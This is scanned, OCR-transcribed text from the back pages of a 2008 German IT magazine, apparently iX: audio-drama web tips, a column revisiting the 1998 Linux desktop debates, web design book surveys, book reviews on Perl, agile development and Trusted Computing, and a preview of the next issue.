Meinung nach heute Erwachsene zu den 
größten Fans der Kinder- und Jugend- 
hörspiele gehören. Das vollständige 
Gespräch gibt es im Welt-Kultur-Archiv 
unter www .welt.de/kultur/article1344 
704/Warum_Die_drei__zum_Einschla 
fen_sind.html. 


Playback auf der Bühne 


Wer die Geschichten der drei Fragezei- 
chen mag, sollte unbedingt den Tour- 
plan des Vollplaybacktheaters (www. 
vollplaybacktheater.de) im Auge behal- 
ten. Das junge Ensemble spielt regelmä- 
Big Folgen auf der Bühne im Playback 
nach. Urkomisch und absolut lohnend. 
Um den Nachwuchs an Hörspiele 
heranzuführen, greifen viele sicherlich 
zu den Serien für die Kleinsten: Bibi 
Blocksberg und Benjamin Blümchen. 
Aus Sicht der Bundeszentrale für politi- 
sche Bildung trägt man damit allerdings 
nicht dazu bei, seine Sprösslinge zu tole- 
ranten und weltoffenen Menschen zu er- 
ziehen. Warum weder die kleine Hexe 
noch der dicke Elefant politisch korrekt 
sind, findet sich im Webangebot der 
BPB unter www ..bpb.de/popup/popup_ 
druckversion.html?guid=2RQI2Y. Ein 
erschreckendes Bild, das in wissen- 
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schaftlicher Form von den stereotypi- 
schen Figuren (Bürgermeister, Polizei, 
Medienvertretern) gezeichnet wird. 

Geht die Leidenschaft für Hörspiele 
über TKKG, die drei Fragezeichen, Bi- 
bi und Benjamin hinaus, empfiehlt sich 
ein Blick ins Hörspielland (www.hoer 
spielland.de). Das Fanportal bietet In- 
formationen zu allen erdenklichen Hör- 
spielreihen, vom A-Team über die 
Pizzabande bis hin zu „Zurück in die 
Zukunft“. Außerdem lassen sich sämt- 
liche Folgen aller Serien kommentie- 
ren, sodass auch der interaktive Spaß 
nicht verloren geht. 

Wer Informationen zum Lieblings- 
sprecher sucht, ist beim Hörspielpor- 
tal (www.hoerspieleportal.de/sprecher/ 
sprecherdb.php) goldrichtig. Über 1800 
Sprecher in fast 6800 Rollen sind hier 
erfasst. Sucht man beispielsweise nach 
dem Sprecher der Rolle des Dr. Rem- 
plem aus der TKKG-Folge „Vampir 
der Autobahn“, trifft man auf Karl 
Walter Diess — mit dieser Information 
kann man sich weitere Rollen des 
Sprechers anzeigen lassen. Wichtig für 
den Hardcore-Fan, der sich auch für 
die Personen hinter den Sprechrollen 


interessiert. Eine etwas übersichtliche- 
re, allerdings weniger Sprecher und 
Rollen umfassende Datenbank gibt es 
unter hörspiele.de (www.hoerspiele.de/ 
hoerspiele/sprecherDB/default.asp). 

Für all diejenigen, die mit den alten 
und neu aufgelegten Kinderhörspielen 
wenig anfangen können, bietet sich der 
ARD-Tatort an, den die Internet-Infos 
des letzten Monats ausgiebig beleuchtet 
haben (www.heise.de/ix/artikel/2008/ 
07/150). Diese Krimiserie wird neuer- 
dings auch als Hörspiel produziert - ei- 
nen interessanten Artikel, der unter an- 
derem die Geschichte der Entstehung 
des Radiohörspiels ein wenig intensiver 
beleuchtet, hat der Spiegel unter wis 
sen.spiegel.de/wissen/dokument/52/01/ 
dokument.html?titel=Renaissance+de+ 
Radiokunst&id=55411025 veröffent- 
licht. Zu hören ist die Audioversion 
des Tatorts jeweils eine Woche lang 
unter radiotatort.ard.de. 

Wer nun Lust auf eine Audio-Ge- 
schichte bekommen hat, jedoch für den 
Anfang kein Geld ausgeben möchte, 
kann sich auf www ..vorleser.net um- 
schauen. Dort stehen rund 500 Down- 
loads kostenlos zur Verfügung. (ka) 


Vor 10 Jahren - 


Großvater erzählt vom Krieg 


Seit Einstein wissen wir, dass die Zeit eine relative Angelegenheit ist. 
Ein Blick in iX 8/98 kann dies bestätigen. Da findet sich eine Notiz zur 
Einführung der digitalen Signatur für das „eGovernment“, die man um- 
standslos ins aktuelle Heft kopieren könnte. Ebenso eine Geschichte über 


die Nutzung von Biometrie in Zugangskontrollsystemen. 


Der Schwerpunkt der Ausgabe lag aber 
auf dem Linux-Desktop, komplett mit 
einer ersten ausführlichen Vorstellung 
von Gnome 0.20, der gerade entstehen- 
den KDE-Alternative. Das Ganze be- 
gleitet von Berichten um das Ot-Toolkit 
von Trolltech, seine Lizenzproblematik 
und der Debatte, wann ein Linux wirk- 
lich „frei“ ist oder eben nicht. 

So liest man den Artikel „Freiheits- 
bewegung“ und ist erstaunt. Ist das 
wirklich erst 10 Jahre her? Die Rheto- 
rik-Schlachten in den Newsgroups, die 
Verdächtigungen und Vorwürfe klin- 
gen wie das Gerumpel aus einer längst 
vergangenen Zeit. Eine Wiedergabe der 
Debatten würde heute langweilen oder 
von einem nachsichtigen Lächeln be- 
gleitet werden: Jaja, der Großvater er- 
zählt vom Krieg. KDE und Suse, Red 
Hat und Gnome, solche Parteien sind 
längst obsolet. Die aufbegehrende Trup- 
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pe der Gnome um Miguel de Icaza ist 
längst bei Novell fest angestellt, das 
mit Opensuse 11 gleich drei Desktops 
anbietet. Trolltech gehört mittlerweile 
der Telefonbude Nokia, die Gnome für 
ihre Internet-Tablets benutzt. Selbst die 
Vorwürfe von Linus Torvalds gegen 
die Bevormundung durch Gnome sind 
Schnee von gestern und klingen wie 
das Gezeter eines alten Pinguins. 

Zehn Jahre nach der „Freiheitsbewe- 
gung“, der Vorstellung des Gnome-Desk- 
tops und einer begleitenden Geschichte 
über die Nutzung von OpenParts bei 
KDE drängt sich die Frage auf, wie es 
heute um den Linux-Desktop bestellt ist. 

Die Antworten können unterschied- 
licher nicht sein. Da ist der jedem Leser 
bekannte Computerexperte, der fest 
davon überzeugt ist, dass Power-User 
nicht mit Linux arbeiten können und 
daher der Desktop „noch nicht reif“ ist. 


Da ist eine Power-Userin wie 
meine Schwägerin, die als 
Buchautorin mit bebilder- 
ten Monster-Manu- 
skripten noch nicht 
einmal gemerkt hat, 
dass ihr Laptop kein Win- 
dows-Rechner mehr ist. Da ist 
ihr Fachhändler, der froh ist, Rech- 
ner mit Linux und nicht mit dem zi- 
ckigen Windows Vista verkaufen zu 
können. 

Und dann ist da der Desktop-De- 
signer, der sich lieber Gedanken über 
mobile Anwendungen macht, weil Desk- 
tops sichnur noch in sinnlosen 3D-Ef- 
fekten überbieten. Vielleicht sollte man 
noch den Fan erwähnen, der davon über- 
zeugt ist, dass über kurz oder lang alles 
aussieht wie auf seinem Airbook. 

Mit dem Erscheinen von Gnome hat 
sich eine Freiheitsbewegung etablieren 
können, in der sich mehrere Desktop- 
Alternativen entwickeln konnten. Wei- 
tere Freiheitsbewegungen sind nach- 
gezogen, etwa das Mono-Projekt als 
Alternativentwurf zu Microsofts .Net. 
Erwähnenswert, weil mit diesen Frame- 
works die Geschichte des Drag & Drop 
weitergeschrieben wird, an deren An- 
fang die rudimentären Windows-Mana- 
ger standen, vor längst vergangenen 10 
Jahren. Detlef Borchers 
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Buchmarkt 


nnerhalb der vergangenen zwei 

bis drei Jahre haben sich die 
Autoren von CSS-Literatur förm- 
lich überschlagen. Mehr als ein 
halbes Dutzend Jahre lang hatten 
die Cascading Stylesheets ein Mauer- 
blümchendasein gefristet, aber in dem 
Maße, in dem die Browserhersteller 
CSS1 und ein bisschen CSS2 (im Sinne 
des leicht abgespeckten CSS 2.1) be- 
rücksichtigten, riskierten mehr und mehr 
Webmaster, ihre Seiten 
mit CSS zu forma- 
tieren, beispiels- 
weise mit div statt 
mit Tabellen zu ar- 
beiten. Das wiede- 
rum rief die genann- 
ten Autoren auf den 
Plan, denn wer an- 
fängt, mit CSS zu ar- 
beiten, freut sich über 
Anleitungen und exten- 
sive Vorschläge. 

Reine HTML-Einfüh- 
rungen als Neuerschei- 
nung gehören mittlerweile zu den bedroh- 
ten Arten, denn mindestens ein bisschen 
CSS- und/oder Javascript-Fauna muss 
heute sein. Es sei denn, der Autor be- 
schränkt sich auf einen Sonderaspekt. 

Um mit dem Mammut unter den dies- 
mal berücksichtigten Büchern zu begin- 
nen: Stefan Münz - Initiator von 
SelfHTML - hat sein „<Webseiten pro- 
fessionell erstellen>“ überarbeitet; die 
dritte Auflage besteht aus etwas mehr als 
1200 Seiten, die (X)HTML, CSS, Java- 
script, PHP und MySQL, XML, Ajax 
und Siteverwaltung behandeln. Neu im 
Vergleich zur vorherigen Aus- 
gabe sind Mikroformate und 


N 
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Webdesign 


sionelles Webdesign mit X)HTML und 
CSS“ (Besprechung in iX 7/06) veröf- 
fentlicht. Und ebenfalls in der zweiten 
Auflage ist bei dpunkt Rachel Andrews 
„CSS-Problemlöser“ mit gut 100 Tipps 
erschienen. Beide Bände dür- 
fen Webdesigner zum Stöbern 
nutzen. 
Peter Müllers „Little Boxes, 
Teil 2“, wie der erste Band bei 
Markt+Technik zu haben, 
setzt die begonnene Arbeit 
fort, indem Müller vor allem 
die Navigation per 
CSS thematisiert — 
horizontal wie verti- 
kal sowie mit zwei 
Ebenen. Außer- 
dem hat der Au- 
tor Kapitel zu inhalt- 
lichen und grafischen Aspekten 
sowie Listen und Formularen 
geschrieben. Weitere Teile be- 
handeln das schon erwähnte 
YAML sowie die Fehlerana- 
lyse mit Firefox und Internet 
Explorer. 

Jeremy J. Sydik geht es 
darum, zugängliche Web- 
sites zu entwerfen: „Desi- 
gning Accessible Web Sites“, er- 
schienen bei den Pragmatic Programmers, 
enthält 36 Tipps, wie Webinhalt für 
Seh- oder Hörbehinderte zu erstellen ist. 
Außerdem widmet sich Sydik Themen 


wie dem Schwierigkeitsgrad der 

fürs Web zu verwendenden Spra- 

che. Keine CSS-Details, sondern 

generelle Anregungen zur Erstel- 

lung von Websites. Tipps, die 
hinsichtlich Seiten für Nichtbehinderte 
ebenfalls gelten. 

Versteht man Webdesign als Content 
Design, drängt sich in Zeiten des in der 
Versionsnummer um eins aufgestiegenen 
WWW das Mashup als Designmethode 
auf — ein Verknüpfen von Inhalten aus 
unterschiedlichen Quellen. Vier Autoren 
haben in Mashup-Manier für O’Reilly ein 
Buch zu diesem Thema verfasst. Zunächst 
führen zwei Kapitel ins Thema ein, bevor 
die Autoren fünf Projekte beschreiben: 
mit PHP und dem Framework Symfony, 
dem .Net-Framework 2.0, Mapplets, 
Javascript und Ruby on 

Rails. Für ex- 

perimentierfreu- 
dige Nachahmer. 
Gleichzeitig Ein- 
führung und Pra- 
xisband. 

Schließlich doch 

zu reinem CSS und 
HTML. Der austra- 
lische Verlag Site- 
point hat in diesem 
Jahr zu beiden The- 
men jeweils eine 
„Ultimate Reference“ 
veröffentlicht. In bei- 
den Bänden nutzen die 
Autoren mehrere Ver- 
sionen des Internet Explorer, Firefox, 
Safari und Opera als Referenz: Was wo 
funktioniert beziehungsweise implemen- 
tiert ist. Klassische Nachschla- 

gewerke. 


Ajax. Ideal für diejenigen, die 
alles gleichzeitig im Überblick 
haben müssen. 

Alle anderen Werke kom- 
men mit weniger Papierge- 
wicht, umfassen dafür nicht so 
viele Bereiche. Recht speziell 
widmet Dirk Jesse seine „CSS- 
Layouts“ dem von ihm erfun- 
denen YAML (Yet Another 
Multicolumn Layout, www. 
yaml.de). Version 2 des Buches 
fußt auf Version 3 von YAML, 
die der Autor für sich und in 
Typo3 behandelt. Wie in der 
vorigen Auflage hat er Generel- 
les über CSS, Box-Modell und 
TE-Bugs vorangestellt. 

Im selben Verlag (Galileo 
Computing) haben Björn Sei- 
bert und Manuela Hoffmann 
eine Neuauflage von „Profes- 
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Rachel Andrew; Der CSS-Problemlöser; Über 100 Lösungen für 
Cascading Stylesheets; Heidelberg (dpunkt) 2008; 2., überarbeitete und 
aktualisierte Auflage; 330 Seiten; € 36,- (Paperback) 


Denny Carl, Jörn Clausen, Marco Hassler, Anatol Zund; Mashups 
programmieren; Grundlagen, Konzepte, Beispiele; Köln (O'Reilly) 2008; 
280 Seiten; € 34,90 [gebunden] 

Dirk Jesse; CSS-Layouts; Praxislösungen mit YAML 3.0; Bonn [Galileo 
Computing) 2008; 2., aktualisierte und erweiterte Auflage; 452 Seiten 
zzgl. DVD; € 34,90 (gebunden) 


lan Lloyd; The Ultimate HTML Reference; Collingwood (Sitepoint) 2008; 
537 Seiten; US-$ 44,95 (gebunden) 


Peter Müller; Little Boxes Teil 2; Webseiten gestalten mit CSS; München 
(Markt+Technik) 2008; 394 Seiten; € 24,95 (Paperback) 


Stefan Münz; «Webseiten professionell erstellen>; Programmierung, 
Design und Administration von Webseiten; München [Addison-Wesley] 
2008; 3., überarbeitete und erweiterte Auflage; 1217 Seiten zzgl. DVD; 
€ 49,95 (gebunden) 


Tommy Olsson, Paul O’Brien; The Ultimate CSS Reference; 
Collingwood (Sitepoint) 2008; 420 Seiten; US-$ 44,95 (gebunden) 

Björn Seibert, Manuela Hoffmann; Professionelles Webdesign mit 
(X)HTML und CSS; Bonn (Galileo Dan) 2008; 2., aktualisierte Auflage; 
366 Seiten zzgl. CD-ROM; € 29,90 [gebunden] 

Jeremy J. Sydik; Design Accessible Web Sites; Thirty-six Keys to 


Creating Content for All Audiences and Platforms; Raleigh, NC (Pragmatic 
Bookshelf) 2007; 318 Seiten; US-$ 34,95 (Paperback) 


Mit drei Bänden aus dem 
Linux-Umfeld hat die Open 
Source Press begonnen, einzel- 
ne Werke in digitaler Form 
(PDF) über die hauseigene 
Website zu vermarkten (www 
.opensourcepress.de). Die Prei- 
se liegen in den Dreißigern, 
das E-Book des Monats (im 
Juli: „Das Debian-System‘“) 
bietet der Verlag für 9,95 € an. 
Galileo Computing hingegen 
setzt darauf, dass Leser ihrer 
Openbooks sich zu Käufern der 
gedruckten wandeln. Leser des 
Rails-Tutorials können sich 
freuen: „Ruby on Rails 2“ 
(www.galileocomputing.de/open 
book/ruby_on_rails/) gehört 
jetzt zu den online les- und 
downloadbaren Büchern. 

Henning Behme 
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Rezensionen 


EERL 


FOURTH EDITION 


eispiele sind ein probates 

Mittel zur Vermittlung von 
Lernstoff - in „Perl by Exam- 
ple“ sind sie das einzige. Die 
Popularität des mittlerweile in 
der vierten Auflage vorliegen- 
den Bandes bestätigt die Be- 
liebtheit dieser Lehrmethode. 
Quigleys Beispiele sind stets 
gleich aufgebaut: Einem kur- 
zen einleitenden Text folgt das 
Codebeispiel mit in Fettschrift 
hervorgehobenen wichtigen 


Ellie Quigley 
Perl by Example 


Upper Saddle River, NJ, 
2007 

Prentice Hall International 
4. Auflage 

1008 Seiten 

49,99 US-$ 

ISBN 978-0-13-238182-6 


Zeilen und einer anschließenden 
ausführlichen Erklärung. 

Die Quelltexte sind einfach 
gehalten und auf das Wesentli- 
che reduziert. Leider verzichtet 
Quigley in ihnen fast immer 
auf die Behandlung von Fehler- 
situationen und Grenzfällen. 
Durch andere kleine Änderun- 
gen an ihnen wie den Einsatz 
des Pragmas „strict“ hätte die 
Autorin ihren Lesern ebenfalls 
Gutes tun können. 


Konzepte und Zusammen- 
hänge lassen sich durch Code- 
beispiele alleine nur schwer 
vermitteln und kommen - ab- 
gesehen von einem Kapitel zur 
Objektorientierung — kaum 
vor. Sie müssen dem Leser 
daher aus anderen Kontexten 
geläufig sein. Der Band eignet 
sich mithin nicht unbedingt 
für Einsteiger, aber für Sys- 
tem-Administratoren und Da- 
tenbank-Entwickler. Mit Aus- 
nahme der vorgestellten CGIs 
ist für deren Zwecke auch die 
schon angesprochene Qua- 
lität der Quelltexte in aller 
Regel ausreichend. 

Für Leser mit und ohne Pro- 
grammiererfahrung bietet der 
Band getrennte Einstiegska- 
pitel und handelt danach sys- 
tematisch die Elemente der 
Kernsprache (Variablen, Kon- 
trollstrukturen, reguläre Aus- 
drücke, eingebaute Funktionen, 
Subroutinen) sowie wichtige 
Erweiterungen ab. Dazu gehö- 


ren unter anderem CGls und 
Datenbankzugriffe mit DBIam 
Beispiel von MySQL. Selbst 
elementare Netzprogrammie- 
rung mit Sockets stellt Quigley 
vor, erstaunlicherweise aber 
nicht die wichtige LWP-Bi- 
bliothek zur Programmierung 
von Webclients. Das Kapitel 
zur systemnahen Programmie- 
rung berücksichtigt Unix- und 
Win32-Plattformen. 

Die Anhänge enthalten ein 
gelungenes kurzes SQL-Tutori- 
al, Informationen zu CGls mit 
der Apache-Erweiterung mod_ 
perl und eine Übersicht aller 
Perl-Funktionen. 

Weniger interessant ist der 
Band für professionelle Perl- 
Entwickler. System- und Da- 
tenbank-Administratoren aber 
finden in ihm eine umfangrei- 
che Sammlung von Vorlagen, 
die ihnen bei der täglichen 
Arbeit mit Perl-Skripten hel- 
fen kann. 

DR. PETER DINTELMANN 


lartus: Sram 5 Shane Wirtcun 


Uri war dies Buch 
als zweite Auflage ge- 
dacht, es entwickelte sich je- 
doch zu einem komplett neuen. 
Dies bringt der Umfang von 
über 400 Seiten zum Ausdruck 
— trotz kleinen Zeichensatzes 
gut lesbar. Wer Fachbücher 
vor allem unterwegs liest, für 
den bedeutet dieser Band ein 
Zusatzgewicht von 700 Gramm 
— die es jedoch wert sind. 
Teil eins bietet eine Einfüh- 
rung in die Agilität und schafft 
damit eine gute Basis. Hier be- 
schreiben die Autoren detail- 
liert die verschiedenen Rollen, 
was man in dieser Ausführlich- 
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James Shore, Shane Warden 


The Art of Agile 
Development 


Sebastopol, CA 2007 
O’Reilly Media, Inc. 

409 Seiten 

38,-€ 

ISBN 978-0-596-52767-9 


keit nicht in vielen agilen Bü- 
chern findet. Außerdem warten 
die Autoren immer wieder mit 
kleinen Beispielen aus dem 
Projektalltag auf. Für Einsteiger 
ist mit Sicherheit der Test am 
Ende des ersten Teils span- 
nend, mit dem sie prüfen kön- 
nen, wie agil ihr Team schon ist. 

Im zweiten Teil werden die 
Praktiken erklärt - hilfreich ist 
dabei der Abschnitt mit Ant- 
worten auf typische Fragen 
(FAQ) zu den jeweiligen Prak- 
tiken. Beispielsweise enthält 
der Fragenkatalog von Pair 
Programming die, ob das nicht 
Zeitverschwendung sei, oder 


was bei einer ungeraden Zahl 
an Programmierern zu tun sei. 

Die Praktiken vermitteln 
Shore und Warden mit einer 
an die Beschreibung von Pat- 
terns angelehnten Struktur: 
Der Motivation folgen Erläu- 
terung, FAQ, Ergebnis, even- 
tuelle Gegenindikationen und 
Alternativen. Wobei Letzteres 
oft recht dürftig ausfällt, ganz 
einfach mangels Alternativen. 

Gut, dass die Autoren viele 
Literaturhinweise geben, was 
leider nicht mehr unbedingt 
üblich ist. Dadurch, dass dieser 
zweite Teil eher als Nach- 
schlagewerk geschrieben ist, 
zieht er sich zwar in die 
Länge, aber von diesem Cha- 
rakter dürften gerade Einsteiger 
profitieren. 

In „Mastering Agility“, dem 
dritten Teil, haben die Autoren 
Anleihen bei verschiedenen 
Meinungsführern der agilen 
Gemeinschaft gemacht, so bei 
Alistair Cockburn, Jim High- 
smith, Mary Poppendieck und 
Kent Beck. Herausgekommen 
sind fünf große Themen, die 
nach Meinung der Autoren 
zur Meisterschaft führen: Ver- 


besserung des Prozesses, Ver- 
trauen in die Menschen, Elimi- 
nierung von Unnötigem, die 
Lieferung von Wertvollem und 
das Streben nach technischer 
Exzellenz. 

In diesem Teil verwenden 
die Autoren eine andere Struk- 
tur als im zweiten. Hier be- 
schreiben sie kurz das jeweilige 
Prinzip, erklären anschließend 
eine Technik, indem sie unter- 
stützende agile Praktiken be- 
nennen, um schließlich die 
Auswirkung von deren Kom- 
bination zu erklären. Danach 
untermauern sie diese Kom- 
bination mit einer Geschichte 
aus der Realität. Unklar bleibt, 
warum bei „Streben nach tech- 
nischer Exzellenz‘ keine kon- 
kreten Techniken vorkommen, 
sondern nur Heuristiken. 

Grundsätzlich handelt es 
sich um ein tolles Buch, dessen 
Stärke die ganzheitliche Be- 
trachtung von Projekten ist. Es 
gehört als Referenz in jedes 
agile Team und kann Anhalts- 
punkte für den Umgang mit 
verschiedenen (unerwarteten) 
Situationen anbieten. 

JUTTA ECKSTEIN 
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Sichere Verfahren des E-Go- 
vernment und der E-Com- 
merce sind nur mithilfe sicherer 
IT realisierbar.“ So eine wohl 
bekannte Erfahrungstatsache 
und gleichzeitig ein Zitat aus 
dem Vorwort von „Trusted 
Computing“ (TC). Einen An- 
satz zur Realisierung einer si- 
cheren IT der Zukunft könnte 
TC darstellen. Gut, dass fast 
zehn Jahre nach der Gründung 
der Trusted Computing Plat- 


Norbert Pohlmann, 
Helmut Reimer (Hrsg.) 


Trusted Computing 


Ein Weg zu neuen 
IT-Sicherheitsarchitekturen 


Wiesbaden 2007 

Vieweg + Teubner Verlag 
252 Seiten 

34,90 € 

ISBN 978-3-8348-0309-2 


form Alliance erstmals ein 
deutsches Buch zu diesem 
Themenbereich vorliegt. 

Auf circa 250 Seiten geben 
insgesamt 16 Berichte einen 
Einblick in die verschiedenen 
Aspekte des Trusted Compu- 
ting: „Einführung und Grund- 
lagen“, „Sicherheitsbausteine 
für Anwendungen“, „Anwen- 
dungsszenarien“ und „Daten- 
schutz- und rechtliche Aspekte“ 
bilden die vier Kernbereiche. 


Durch grundlegende Kapitel 
am Anfang ist das Buch für 
den Einsteiger geeignet und 
räumt mit manchen falschen 
Behauptungen auf. 
Anschließend folgt eine 
Darstellung der verschiedenen 
Sicherheitsbausteine: Wozu 
kann man TC beziehungsweise 
ein TPM nutzen? Die bilden 
die Grundlage für das Ver- 
ständnis des folgenden Ab- 
schnitts, der die Möglichkeiten 
und Probleme des TC in der 
Praxis beschreibt. Es geht um 
Fragestellungen zum Schlüs- 
selmanagement in Unterneh- 
men oder den Einsatz von TC in 
mobilen Geräten/Anwendun- 
gen sowie entsprechende Lö- 
sungsansätze. Auffällig ist, 
dass gerade der Bereich der 
Anwendungen zum Digital 
Rights Management (DRM) 
nur am Rande vorkommt. Das 
Thema Datenschutz kommt 
bei all der Technik für manche 
Leser vielleicht ein wenig zu 


kurz, denn ihm und den recht- 
lichen Aspekten ist jeweils nur 
ein Bericht gewidmet. 

Bei so viel Stoff bleiben die 
Berichte zwangsweise eher 
an der Oberfläche. Wer etwa 
exemplarischen Quellcode oder 
konkrete Konfigurationsbei- 
spiele sucht, dürfte enttäuscht 
sein. Vielmehr geht es um die 
Vermittlung von Konzepten, 
und das gelingt den Autoren 
recht gut. Das Buch als Samm- 
lung von Berichten verschie- 
dener Autoren hat den Vorteil, 
dass die jeweiligen Spezialis- 
ten zu Wort kommen. Nachtei- 
lig ist, dass so keine einheitli- 
che Sprache zustande kommen 
kann, was durch die Mischung 
von deutschen und englischen 
Texten verstärkt wird. Summa 
summarum erhält man aber 
ein für Techniker wie Berater 
interessantes Übersichtswerk, 
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das bisher seinesgleichen 

sucht. 
CHRISTOPH WEGENER 
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Das bringen 


SQL Server 2008 und 
Virtual Earth 


Internet-Kartendienste wie Google Maps 
oder Virtual Earth befreiten die geografi- 
schen Informationen aus den heiligen Hal- 
len der Vermessungsämter und brachten 
sie auf den heimischen PC. Mit Microsofts 
SQL Server 2008 kann der Anwender nun 
diese Daten lokal speichern und verarbei- 
ten, aber leider hat er keine Funktion, die 
das Ergebnis auf einer Landkarte darstellt. 
Hier muss der Entwickler mit einigen Zei- 
len Code einspringen und Geo-Anwendun- 
gen erstellen. 


Marktübersicht: 
Integrierte Archivsysteme 


Die Art der Archivierung von Geschäfts- 
daten muss nicht nur technischen Überle- 
gungen genügen, sondern auch nationale 
und eventuell sogar internationale juristi- 
schen Vorschriften einhalten. Eine Archi- 
vierungs-Appliance, die Hard- und Soft- 
ware aus einer Hand liefert, kann in vielen 
Fällen diesbezüglich das Leben erleich- 
tern. Nicht ohne Grund ist so ein vielfälti- 
ges Angebot entstanden. 


Heft 09/2008 
erscheint am 21. August 2008 


Open-Source-Websicherheit 


In der vorliegenden Ausgabe ist unter anderem die Re- 
levanz von Web Application Firewalls (WAF) für die 
Sicherheit von Webanwendungen ein Thema. Der be- 
kannteste Open-Source-Vertreter dieser Gattung, der 
auch in produktiven Umgebungen ausreichend Schutz 
bietet, heißt Modsecurity. Er entstand unter den Fitti- 
chen des Apache-Projekts und kommt gemeinsam mit 
dem freien Webserver auf Unix und Windows zum Ein- 
satz. iX untersucht, was die aktuelle Version 2.5 der 
freien WAF kann und was nicht. 


Framework 
für Ajax und mehr 


Javascript-Bibliotheken, die wenigstens 
auch eine Ajax-Schnittstelle bieten, gibt es 
in dreistelliger Zahl. jQuery, das derzeit in 
Version 1.2.3 vorliegt, unterscheidet sich 
von den Großen in diesem Feld dadurch, 
dass es sich auf weniger beschränkt, aber 
außer Ajax beispielsweise Animationen 
erleichtert - für die gängigen Browser. 


Fibre Channel 
Troubleshooting 


Nicht nur beim Einrichten des ersten eige- 
nen SAN tauchen Fehler auf. Implemen- 
tiert man das Netz schrittweise und über- 
prüft die Schritte, kann man nicht nur die 
Fehler schneller eingrenzen und beheben, 
sondern nebenbei fällt auch eine Checklis- 
te für die künftige Fehlerjagd ab. 


Kein wichtiges Thema mehr versäumen! 
Die aktuelle iX-Inhaltsübersicht per E-Mail 


Man verpasst ja 
sonst schon genug! 
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I _J wuyazlı für 
CT zumpuier 


ln Jasanık 


Notebooks ab 300 Euro im Test 


QoS-Router: Bandbreite richtig 
einteilen 


Langzeittest: Wie lange halten die 
Daten auf DVD-R? 


LCD-Monitore: Die Schnäppchen 
ab 150 Euro 
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Technology 


Das 


Review 


Die nächste Blase? Warum es so 
schwierig ist, mit dem Web 2.0 Geld 
zu verdienen. 


Volle Ladung: Ein Akku aus dem 
MIT soll Elektroautos voranbringen. 


Hotel der Zukunft: In Hongkong 
schaffen Experten digitalen Komfort. 
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Hans Schmid: Wir sind Mars- 
menschen. 


Stephan Schleim: Fünf Gründe für 
Psycho-Enhancement 
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